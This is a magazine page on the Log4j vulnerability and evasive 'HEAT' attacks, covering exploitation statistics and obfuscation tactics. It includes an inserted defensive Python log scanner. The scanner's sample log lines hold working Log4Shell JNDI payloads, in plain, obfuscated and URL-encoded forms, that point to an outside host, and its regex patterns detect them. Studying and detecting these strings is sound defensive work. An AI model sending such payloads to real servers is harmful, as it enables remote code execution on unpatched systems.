Page 116 - Cyber Defense eMagazine Special RSA Conference Annual Edition for 2022

Ease of exploitation and HEAT

A major problem with Log4j is not just its potential to cause immense damage. Equally, it is relatively simple to exploit using Log4Shell.

Given this combination, the National Institute of Standards and Technology (NIST) gave it a rare 10 out of 10 rating under the Common Vulnerability Scoring System (CVSS). With such a low bar to exploitation, it can be leveraged by a wide range of attackers with malicious intent.

This is demonstrated by the sheer volume of attacks that occurred once the vulnerability was made public: the first exploitation attempt was recorded within just nine minutes, and a further 830,000 were made in the three days thereafter, before a patch was released.

What is equally concerning is that a proof-of-concept attack using the Log4j vulnerability had been detected eight days earlier, suggesting that the vulnerability was both known and possibly exploited before then.

Indeed, the evidence points to one outcome: multiple attackers have successfully infiltrated various enterprise servers through the Log4Shell exploit.

It is likely that they will not have given away any obvious sign of their success. Instead, they will be probing networks and identifying where they can obtain the most value or, in the eyes of their victims, inflict the most damage.

This is a common trend amongst attackers, allowing them to extract the most value possible from their exploits. The infamous and devastating SolarWinds attack affecting US government agencies and various Fortune 500 firms is a prime example: the attackers had gained access to the company network nine months before the attack was identified.

Therefore, we expect several attacks stemming from the Log4j vulnerability to emerge throughout 2022 and even beyond, with Highly Evasive Adaptive Threats (HEAT) being a critical tool in the attackers' arsenal, enabling them to conduct their work under the radar.

HEAT attacks are defined by the specific techniques attackers use to evade existing security defences. With a full understanding of the technology integrated into the existing security stack, threat actors are leveraging data obfuscation tactics such as HTML smuggling and JavaScript obfuscation as mechanisms to avoid detection.
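The exploitation attempts counted above and the obfuscation-based evasion just described both show up in ordinary web access logs, so a defender's first check is a log scan. The following is an added example, not code from the article: it scans constructed log lines for Log4Shell-style JNDI lookup strings, first URL-decoding and collapsing the nested-lookup tricks (`${lower:...}`, `${...:-...}`) that let an obfuscated attempt slip past a naive `${jndi:` match. The log lines, IP addresses and timestamps are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not from the article).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:08:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:08:23:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.9 - - [10/Dec/2021:08:25:11 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.9/a} HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.3 - - [10/Dec/2021:08:26:00 +0000] "GET /?x=${${::-j}${::-n}di:dns://198.51.100.9/x} HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.4 - - [10/Dec/2021:08:27:30 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.6 - - [10/Dec/2021:08:30:00 +0000] "GET /docs/jndi-lookup.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Inner lookups that Log4j resolves before the outer ${jndi:...} one:
# ${lower:x} -> x, ${upper:x} -> X, ${name:-default} -> default.
_INNER = re.compile(r"\$\{(?:lower:([^${}]*)|upper:([^${}]*)|[^${}]*:-([^${}]*))\}")
# Plain form after normalisation; captures the scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

def _resolve(m: re.Match) -> str:
    if m.group(1) is not None:
        return m.group(1).lower()
    if m.group(2) is not None:
        return m.group(2).upper()
    return m.group(3)

def normalize(s: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested lookups until the string stops changing."""
    s = unquote(s)
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s

def scan_line(line: str) -> "str | None":
    """Return the JNDI scheme if the line carries a lookup string, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None

def scan_log(text: str) -> list:
    """(line number, scheme) for every log line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        scheme = scan_line(line)
        if scheme:
            hits.append((n, scheme))
    return hits
```

A plain `jndi` mention (line 6) is not flagged, while the three obfuscated attempts on lines 3 to 5 are reported with the same scheme as the unobfuscated one on line 2.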

HEAT attacks present many challenges of their own to security professionals. Several HEAT attack characteristics actually serve useful purposes, and therefore can't be blocked altogether. Instead, workarounds are needed to ensure that HEAT attacks are prevented.
